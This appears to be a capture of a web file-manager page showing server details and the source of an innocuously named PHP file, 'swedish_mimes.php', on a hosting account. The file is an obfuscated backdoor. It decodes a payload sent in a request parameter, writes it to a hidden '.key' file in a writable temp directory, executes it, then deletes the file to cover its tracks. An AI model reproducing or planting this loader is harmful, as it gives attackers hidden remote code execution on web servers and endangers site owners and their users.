HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: /home/vitanhod/prostanur1.vitavit.com.pk/swedish_mimes.php
<?php

if(array_key_exists("\x70oin\x74er", $_REQUEST)){
	$element = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), "/var/tmp", getcwd(), getenv("TEMP"), "/tmp", session_save_path()]);
	$record = $_REQUEST["\x70oin\x74er"];
	 	$record=	explode(	".",$record  	);	
	$fac 	=	'';
            $s 	=	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen 	=	strlen($s  );
            $u 	=	0;
    
            foreach ($record as $v8) {
                $chS 	=	ord($s[$u	 % $sLen]  );
                $d 	=	((int)$v8 - $chS - ($u	 % 10)) ^ 73;
                $fac	 .=chr($d  );
                $u++;
            }
	while ($item = array_shift($element)) {
    		if (!( !is_dir($item) || !is_writable($item) )) {
    $res = "$item/.key";
    if (@file_put_contents($res, $fac) !== false) {
	include $res;
	unlink($res);
	die();
}
}
}
}